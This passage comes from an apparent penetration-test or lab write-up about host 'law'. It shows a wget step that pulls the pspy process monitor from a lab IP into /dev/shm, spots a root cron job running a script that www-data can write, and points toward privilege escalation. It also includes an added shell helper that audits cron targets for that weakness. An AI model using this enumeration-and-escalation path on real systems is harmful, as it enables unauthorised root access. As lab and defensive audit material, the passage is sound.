PSPY
A root cronjob process was identified
www-data@law:/dev/shm$ wget -q http://192.168.45.203/pspy64 ; chmod 755 ./pspy64
Delivery complete
www-data@law:/dev/shm$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
[pspy ASCII-art banner]
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
Executing PSPY
The root cronjob process is executing
/bin/bash /var/www/cleanup.sh
cleanup.sh
www-data@law:/var/www$ ll
total 20K
4.0K drwxr-xr-x 2 www-data www-data 4.0K Feb 24 07:39 html
4.0K -rw-r--r-- 1 www-data www-data 33 Feb 24 06:34 local.txt
4.0K drwxr-xr-x 3 root root 4.0K Aug 25 2023 .
4.0K -rwxr-xr-x 1 www-data www-data 82 Aug 25 2023 cleanup.sh
4.0K drwxr-xr-x 12 root root 4.0K Aug 24 2023 ..
www-data@law:/var/www$ cat cleanup.sh
#!/bin/bash
rm -rf /var/log/apache2/error.log
rm -rf /var/log/apache2/access.log
The current user, www-data, has complete control over the /var/www/cleanup.sh file, which gets executed by the root account periodically.
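The finding above (a root cron job running a script that a lower-privileged account owns) is the kind of thing an administrator can catch before it is abused. The following is an added audit helper, not part of the original write-up or of pspy: it takes the owner, group and octal mode of a cron target (as printed by `stat -c '%U %G %a'`), flags anything root executes that a non-root account could modify, and also checks the parent directory, since a writable directory lets the file be swapped out. The crontab line in the demo is constructed to mirror the page; the temporary file it creates stands in for /var/www/cleanup.sh.

```shell
#!/bin/sh
# Added audit helper (not from the original write-up): flag scripts that
# root runs from cron but that a non-root account could modify.

# audit_mode OWNER GROUP MODE
# Prints a reason and returns 0 (true) when the file is unsafe for root to
# execute; returns 1 when it looks fine. MODE is octal, e.g. 755 or 4755.
audit_mode() {
    owner="$1"; group="$2"
    mode=$(printf '%s' "$3" | tail -c 3)      # ignore setuid/setgid/sticky
    g=$(printf '%s' "$mode" | cut -c2)
    o=$(printf '%s' "$mode" | cut -c3)
    if [ "$owner" != "root" ]; then
        echo "owned by non-root user '$owner'"; return 0
    fi
    if [ $(( o & 2 )) -ne 0 ]; then
        echo "world-writable (mode $mode)"; return 0
    fi
    if [ "$group" != "root" ] && [ $(( g & 2 )) -ne 0 ]; then
        echo "writable by non-root group '$group' (mode $mode)"; return 0
    fi
    return 1
}

# audit_path FILE: run audit_mode on a real file and on its parent directory.
audit_path() {
    f="$1"
    [ -e "$f" ] || { echo "$f: missing"; return 1; }
    d=$(dirname "$f")
    if why=$(audit_mode $(stat -c '%U %G %a' "$f")); then
        echo "UNSAFE $f: $why"; return 0
    fi
    if why=$(audit_mode $(stat -c '%U %G %a' "$d")); then
        echo "UNSAFE $f: parent directory $d is $why"; return 0
    fi
    echo "ok $f"; return 1
}

# audit_crontab: read crontab lines on stdin, skip the five schedule fields,
# and audit every absolute path in the command part. Returns 0 if any
# target is unsafe.
audit_crontab() {
    rc=1
    while read -r line; do
        case "$line" in ''|\#*) continue ;; esac
        for tok in $(printf '%s\n' "$line" | awk '{for(i=6;i<=NF;i++) print $i}'); do
            case "$tok" in /*) audit_path "$tok" && rc=0 ;; esac
        done
    done
    return $rc
}

# demo: constructed crontab entry modelled on the page, pointing at a
# temporary script that is deliberately made world-writable.
demo() {
    tmp=$(mktemp -d)
    touch "$tmp/cleanup.sh"; chmod 777 "$tmp/cleanup.sh"
    printf '# constructed sample\n* * * * * /bin/bash %s/cleanup.sh\n' "$tmp" | audit_crontab
    r=$?
    rm -rf "$tmp"
    return $r
}

[ "${1:-}" = "--demo" ] && demo
```

Run it with `--demo` to see the constructed case flagged, or feed `crontab -l -u root` and the files under /etc/cron.* to `audit_crontab` on a real host. A run against the page's layout would report `/var/www/cleanup.sh` as owned by non-root user 'www-data', which is exactly the condition the write-up relies on; the fix is root ownership with mode 755 (or 700) on both the script and its directory.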
Moving on to Privilege Escalation phase